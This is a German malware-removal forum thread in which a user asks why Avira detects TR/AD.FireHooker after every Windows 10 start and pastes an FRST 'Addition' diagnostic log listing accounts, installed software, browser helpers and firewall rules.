Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.

Thema geschlossen
Alt 03.10.2020, 22:30   #1
Öhm
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Hallo,

ich habe seit ein paar Tagen das Phänomen, dass Avira ein paar Minuten nach dem PC Start eine Datei in Quarantäne schiebt:TR/AD.FireHooker
Bei einem kompletten Virenscan des PCs hat Avira nichts gefunden. Angeblich ist der PC sauber. Avira findet allerdings zuverlässig bei einem Neustart wieder die TR/AD.FireHooker Datei.

Wie werde ich diese Datei wieder los bzw. worum handelt es sich bei der Datei?

Vielen Dank für die Hilfe!

FRST würde ich gerne posten, scheint allerdings zu lang zu sein.

Im folgenden die Addition:

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 03-10-2020
durchgeführt von Tamy (03-10-2020 21:59:37)
Gestartet von C:\Users\Tamy\Desktop
Windows 10 Pro Version 2004 19041.508 (X64) (2020-08-18 06:57:41)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Admin (S-1-5-21-950702919-2450676760-769127011-1002 - Limited - Enabled)
Administrator (S-1-5-21-950702919-2450676760-769127011-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-950702919-2450676760-769127011-503 - Limited - Disabled)
Gast (S-1-5-21-950702919-2450676760-769127011-501 - Limited - Disabled)
Tamy (S-1-5-21-950702919-2450676760-769127011-1001 - Administrator - Enabled) => C:\Users\Tamy
WDAGUtilityAccount (S-1-5-21-950702919-2450676760-769127011-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {88AE6B46-DC3C-455A-A21B-085F285A3546}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {33CF8AA2-FA06-4AD4-98AB-332D53DD7FFB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.012.20048 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.433 - Adobe)
Amazon Kindle (HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Amazon Kindle) (Version: 1.17.1.44183 - Amazon)
Audacity 2.3.3 (HKLM-x32\...\Audacity_is1) (Version: 2.3.3 - Audacity Team)
Avira (HKLM-x32\...\{47430B15-7CE6-46CF-903E-B85CD2D29A7D}) (Version: 1.2.151.3852 - Avira Operations GmbH & Co. KG) Hidden
Avira (HKLM-x32\...\{f24507a8-a438-4e46-9563-6d53c727bd7e}) (Version: 1.2.151.3852 - Avira Operations GmbH & Co. KG) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.2009.1995 - Avira Operations GmbH & Co. KG) Hidden
Avira Phantom VPN (HKLM-x32\...\Avira Phantom VPN) (Version: 2.35.1.21885 - Avira Operations GmbH & Co. KG) Hidden
Avira Privacy Pal (HKLM-x32\...\{F2BC8305-DFBE-4C02-A906-9BBD8EE299A3}_is1) (Version: 2.0.0.1904 - Avira Operations GmbH & Co. KG)
Avira Security (HKLM-x32\...\Avira Security_is1) (Version: 1.0.37.12019 - Avira Operations GmbH & Co. KG) Hidden
Avira Security (HKLM-x32\...\AviraSecurityUninstaller) (Version:  - Avira Operations GmbH & Co. KG;)
Avira Software Updater (HKLM-x32\...\{073825B9-FF06-4690-8CE4-3C0B72036122}) (Version: 2.0.6.37231 - Avira Operations GmbH & Co. KG) Hidden
Avira System Speedup (HKLM-x32\...\Avira System Speedup_is1) (Version: 6.5.0.10950 - Avira Operations GmbH & Co. KG) Hidden
Blackmagic RAW Common Components (HKLM\...\{B5ABFF44-9702-4CA1-A7D8-DBA659709C49}) (Version: 1.7 - Blackmagic Design)
calibre 64bit (HKLM\...\{0185ADA8-A025-46A7-8A5C-7F5C2C000CC5}) (Version: 4.21.0 - Kovid Goyal)
DaVinci Resolve (HKLM\...\{74302397-BD1E-4917-B728-A1233CDEB39A}) (Version: 16.2.0055 - Blackmagic Design)
DaVinci Resolve Keyboards (HKLM\...\{04F776FB-37A2-4116-84F2-6CF3D731999D}) (Version: 1.0.0.0 - Blackmagic Design)
DaVinci Resolve Panels (HKLM\...\{567706B7-1501-43BC-81AB-C7E306B40C73}) (Version: 1.3.2.0 - Blackmagic Design)
Die Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.63.136.1010 - Electronic Arts Inc.)
doPDF 7.3 printer (HKLM\...\doPDF 7 printer_is1) (Version:  - Softland)
GUILD WARS (HKLM-x32\...\Guild Wars) (Version:  - )
Guild Wars 2 (HKLM\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
IrfanView 4.53 (64-bit) (HKLM\...\IrfanView64) (Version: 4.53 - Irfan Skiljan)
Java 8 Update 201 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180201F0}) (Version: 8.0.2010.9 - Oracle Corporation)
Logitech Gaming Software 9.00 (HKLM\...\Logitech Gaming Software) (Version: 9.00.42 - Logitech Inc.)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.68 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.29 - )
Microsoft Office 365 ProPlus - de-de (HKLM\...\O365ProPlusRetail - de-de) (Version: 16.0.12527.21104 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\OneDriveSetup.exe) (Version: 20.143.0716.0003 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{CFF44AE9-2908-4D7D-B48B-1CB5139015C7}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox 81.0.1 (x64 de) (HKLM\...\Mozilla Firefox 81.0.1 (x64 de)) (Version: 81.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.2.1 - Mozilla)
Mozilla Thunderbird 68.12.1 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 68.12.1 (x86 de)) (Version: 68.12.1 - Mozilla)
NVIDIA HD-Audiotreiber 1.3.38.16 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.16 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 23.2.1 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 10.5.73.41506 - Electronic Arts, Inc.)
PDF24 Creator 9.2.1 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: 9.2.1 - PDF24.org)
Pixum Fotowelt (HKLM-x32\...\Pixum Fotowelt) (Version: 6.4.7 - CEWE Stiftung u Co. KGaA)
Skype Version 8.62 (HKLM-x32\...\Skype_is1) (Version: 8.62 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Sweet Home 3D version 6.3 (HKLM\...\Sweet Home 3D_is1) (Version: 6.3 - eTeks)
Teams Machine-Wide Installer (HKLM-x32\...\{39AF0813-FA7B-4860-ADBE-93B9B214B914}) (Version: 1.2.0.34161 - Microsoft Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.3.2 - TeamSpeak Systems GmbH)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 2.6.3.0 - Zenimax Online Studios)
Twitch (HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 8.0.0 - Twitch Interactive, Inc.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.11 - VideoLAN)
Web Companion (HKLM-x32\...\{4d874114-3b9f-49df-849d-3e8d496c69af}) (Version: 6.0.2270.4122 - Lavasoft)
YuLinc AppShare Screen Sharing (HKLM-x32\...\{c24e795a-89f0-4ca3-a185-24a140e22413}) (Version: 5.1.4.22070 - netucate systems GmbH)

Packages:
=========
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-10-26] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-20] (Microsoft Studios) [MS Ad]

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers1: [Shell Extension for Malware scanning] -> {45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll [2020-10-01] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
ContextMenuHandlers1: [SystemSpeedupFilesMenu] -> {14cb2bd0-2375-3d10-9b5d-5e18865c8959} => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.ShellExtension.DLL [2020-06-05] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
ContextMenuHandlers4: [SystemSpeedupFoldersMenu] -> {700866bb-c8e9-3e71-b359-abb28baed0e8} => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.ShellExtension.DLL [2020-06-05] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2019-10-03] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers5: [SystemSpeedupDesktopMenu] -> {0cab5786-30e8-3185-9b3b-ccefbf1b8afe} => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.ShellExtension.DLL [2020-06-05] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
ContextMenuHandlers6: [Shell Extension for Malware scanning] -> {45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll [2020-10-01] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)

==================== Verknüpfungen & WMI ========================

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2017-10-13 12:43 - 2017-10-13 12:43 - 004048896 _____ (Digia Plc and/or its subsidiary(-ies)) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\Qt5Core.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 000816640 _____ (Digia Plc and/or its subsidiary(-ies)) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\Qt5Network.dll
2020-09-16 11:44 - 2020-09-16 11:44 - 000913920 _____ (ServiceStack) [Datei ist nicht signiert] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\ServiceStack.Text\6e8040da5ae4ebd7181660c1b791507c\ServiceStack.Text.ni.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 022317056 _____ (The ICU Project) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\icudt51.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 001767424 _____ (The ICU Project) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\icuin51.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 001295872 _____ (The ICU Project) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\icuuc51.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-950702919-2450676760-769127011-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_201\bin\ssv.dll [2019-01-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_201\bin\jp2ssv.dll [2019-01-17] (Oracle America, Inc. -> Oracle Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\sharepoint.com -> hxxps://combs4nvt-files.sharepoint.com
IE trusted site: HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2018-04-12 01:38 - 2018-04-12 01:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files\Calibre2\;C:\Program Files (x86)\nodejs\
HKU\S-1-5-21-950702919-2450676760-769127011-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Tamy\Downloads\Bilder\Bilder\Neuer Ordner (3)\0152eb2de96d653836060b2754ef0eb2.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\StartupApproved\Run: => "OneDrive"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{030D48D8-0797-4E49-B858-E0758C6387E0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{4A3B0BFE-355B-43E1-A895-A0F45DDEA04E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Suicide of Rachel Foster\TSORF.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{14EE9A49-C174-4031-A7F9-15537AFF764B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Suicide of Rachel Foster\TSORF.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{F4EDE0C2-AB33-46AC-8330-4B075006873C}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{965A77BD-43B4-436A-8275-E591F73134FF}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{645BD930-3B27-4C7D-B627-1D6C88061B89}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [{8168AAC9-F50C-48C6-97DE-70988A24B3F3}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [{F10EA35A-29D0-4152-BB40-924B8409EBEA}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin_LE\TS4.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [{E4056FC9-4713-4553-B868-03B545CDC347}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin_LE\TS4.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [UDP Query User{E23C4AF5-BBFD-4304-9DF2-FACED462503F}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [TCP Query User{761E52A8-1100-43BB-8024-22C25A720FB7}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [{1E24983F-A821-47B1-85EE-6DBF5AA484F4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{B4611A1F-9566-412D-B372-F38DF22C3619}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{225B842E-627D-4FCE-81C3-AE5DE9CC638F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{55736684-752F-47A8-934E-F85FB12EC8DA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{BB75EDAB-973D-4F9B-A171-5380D523757A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{891D0F7E-DCE0-4090-A346-ECCDBC5C8814}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{D507C8A0-3DA7-4B38-9E5D-A4663886F415}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\DPDecoder.exe (Blackmagic Design Pty Ltd -> )
FirewallRules: [{DA2CAECB-6025-4136-901F-0C9C5DFE182B}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\TangentPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{DC548F85-4E0B-4366-9984-2707BC1B6E1C}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\EuphonixPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{850872BA-868F-4D1E-9ACD-25A6ED1CE0A8}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\JLCooperPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{3A2C5ABF-BEE7-462A-89C6-2A3126301305}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\DaVinciPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{814B36DF-C514-46C8-8FE3-B14C5CF227D2}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\bmdpaneld.exe () [Datei ist nicht signiert]
FirewallRules: [{E0B64A32-C70F-482B-8E70-128DA5C23218}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\Resolve.exe (Blackmagic Design Pty Ltd -> Blackmagic Design Pty. Ltd.)
FirewallRules: [{7E81C17B-2276-43EC-BF07-0D765A5CB996}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{0ABF2F82-E31E-411D-8A11-18814F784E85}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{A37732DF-FAB4-420E-A54D-2EAD431FDD00}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{02158A46-93F7-40A9-976F-C7A6B8EB948A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{5F163849-15A9-43DB-B306-96FF8DF36463}C:\program files\blackmagic design\davinci resolve\fuscript.exe] => (Allow) C:\program files\blackmagic design\davinci resolve\fuscript.exe (Blackmagic Design Pty. Ltd.) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{1D7131E5-C7FD-4C56-9C00-6CC51F940CDC}C:\program files\blackmagic design\davinci resolve\fuscript.exe] => (Allow) C:\program files\blackmagic design\davinci resolve\fuscript.exe (Blackmagic Design Pty. Ltd.) [Datei ist nicht signiert]
FirewallRules: [{CE3BCED8-74C1-4B54-955D-73C9AB5209FD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{1B2973C1-460E-4647-8935-E50C08C1B84C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{76BAC813-E520-4799-9E99-B659E4208E1D}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{E73705AA-6EEB-48C5-8AE9-B8557E076728}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{75E54FEE-B187-46B4-8E17-EC8E1E4ED191}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [TCP Query User{AEEDAE66-4725-4CA1-B9BB-5D2A76310B36}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [{E86E1885-0869-411E-B2B5-15DF8A5C9A8C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TPH\TPH.exe () [Datei ist nicht signiert]
FirewallRules: [{E43CD189-F465-4F84-B02F-DA079B8CBCEC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TPH\TPH.exe () [Datei ist nicht signiert]
FirewallRules: [UDP Query User{927215D3-13D3-4629-94C1-54AF07C173D5}C:\users\tamy\downloads\mirc\mirc\mirc.exe] => (Block) C:\users\tamy\downloads\mirc\mirc\mirc.exe (mIRC Co. Ltd.) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{8D775FFB-10E3-40BF-8461-A238C513FA75}C:\users\tamy\downloads\mirc\mirc\mirc.exe] => (Block) C:\users\tamy\downloads\mirc\mirc\mirc.exe (mIRC Co. Ltd.) [Datei ist nicht signiert]
